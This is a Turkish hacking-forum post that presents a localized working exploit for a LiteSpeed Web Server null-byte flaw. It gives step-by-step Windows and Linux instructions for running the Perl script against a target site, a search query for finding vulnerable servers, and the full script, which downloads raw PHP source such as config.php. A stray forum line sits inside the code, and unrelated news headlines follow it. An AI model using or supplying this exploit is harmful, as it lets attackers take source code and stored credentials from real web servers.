|
|
|
Tarih : 13.07.2010 - 08:05:57 |
|
| Litespeed Açığı Türkçe |
|
|
|
Açığın Orjinal ismi : Litespeed Technologies Web Server Remote Poison null byte Exploit
Açığın Türkçe ismi : Litespeed Web server Uzaktan Zehirleme
Açığı bulan kişi : Kingcope
Açığın Yaptığı: Açıklar Sadece Site scriptlerinde değil Bazende Sitelerin Bulunduğu Web Serverlarda oluyor Bu açık ile config.php ve index.php Gibi dosyaları bilgisayarımıza çekiyor yani bize .php 'yi download etme şansı veriyor
Türkçeleştirme : Madconfig
Web Server nedir: Web Server Bir Serverın Yayın Yonetmenidir. Web sunucusu ya da ağ sunucusu, İnternet üzerinde bir web sitesinin yayınından sorumlu olan sunucudur. HTTP başta olmak üzere HTTPS, FTP, SMTP, POP3, DNS ve hatta gerçek zamanlı veri akışı (streaming media) hizmeti veriyor olabilir.
Exploit Anlatımı : Exploiti Kullanabilmek için Bilgisayarınızda Perl Yüklü olmalıdır
Exploitin Windows işletim sisteminde kullanımı şu dur ;
lite.pl olarak kaydedin Exploiti ve C:/Perl/bin Klasörüne atın
sonra Başlat > çalıştır > CMD yazıp enterlayın
gelen MS-DOS ekranına
cd.. komutu verin bu işlemi C:/ dizinine inene kadar Tekrarlayın
C:> < bunu görünce cd Perl/bin yazip enterlayın daha sonrasindan PHP- Kodu:
perl lite.pl www.hedefsite.com index.php
yazip
entera basin eğer açık varsa exploit PHP- Kodu:
www.hedefsite.com-index.php
olarak indirecektir index.php'yi daha sonrasında Exploit 'in bulunduğu dizindeki dosyayı okumanız yeterlidir
Linux için kullanımı :
exploiti masaüstünüze lite.pl olarak kaydedin
Terminali açın cd Masaüstü yazip enterlayın
perl lite.pl www.hedefsite.com index.php
yazip enterlayın
Exploit :
#!/usr/bin/perl
#
#Litespeed Uzaktan Zehirleme
#Bulan Kingcope
#Google Araması: ""Proudly Served by LiteSpeed Web Server""
#Türkçeleştirme: Madconfig ~ Wordlhackerz.com
#Haziran 2010
#Fikri verdigi için Milw0rm'a Teşekkürler
use IO::Socket;
use strict;
sub getphpsrc {
my $host = shift;
my $file = shift;
if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
my $file2 = $file;
$file2 =~ s///_/g;
print "Kodlar kaydedildi $file > $host-$file2\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp') || die("Baglanti saglanamadi $ARGV[0]");
print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
close\r\n\r\n";
my $buf = "";
my $lpfound = 0;
my $saveme = 0;
my $savveme = 0;
while(<$sock>) {
if ($_ =~ /LiteSpeed/) {
$lpfound = 1;
}
if ($saveme == 2) {
$savveme = 1;
}
if ($saveme != 0 && $savveme == 0) {
$saveme++;
}
if ($_ =~ /Content-Length:/) {
$saveme = 1;
}
if ($savveme == 1) {
$buf .= $_;
}
}
if ($lpfound == 0) {
print "Litespeed Server olmaya bilir yinede acik Dosya kaydedildi.\n";
}
open FILE, ">$host-$file2";
print FILE $buf;
close FILE;
print "Tamamlandi.\n";
}
print "Litespeed Uzaktan Zehirleme\n";
print "Acıgı Bulan Kingcope\n";
????: Worldhackerz.com ~ Hack Team // Hacking Akademi http://www.worldhackerz.com//showthread.php?t=1899
print "Turkcelestirme Madconfig ~ www.worldhackerz.com\n";
print " Haziran 2010\n\n";
if ($#ARGV != 1) {
print "Kullanımı: perl lite.pl <domain/ip> <php dosyasi>\n";
print "Ornek: perl lite.pl www.worldhackerz.com index.php\n";
exit(0);
}
getphpsrc($ARGV[0], $ARGV[1]);
print "İşlem Tamamlandı ~ Türkçeleştirme madconfig :>.\n";
|
|
)
CHPde bir kaset skandalı daha
Sanal Alem Hackte Yarışıyor
Şok Saldırılar Gündem Belirliyor
THK Sabiha Gökçen Havacılık ve Uzay Üniversitesi adıyla kurulacak Türkiyenin ilk havacılık üniversitesi
Çevrimiçi ortamlara girilen kişisel bilgilerin silinse bile kaybolmayacağı uyarısı bu kez de internet güvenliği firması Trend Microdan geldi.
İhanet Uğruna..
Hack Haber Sitesi Hacklendi..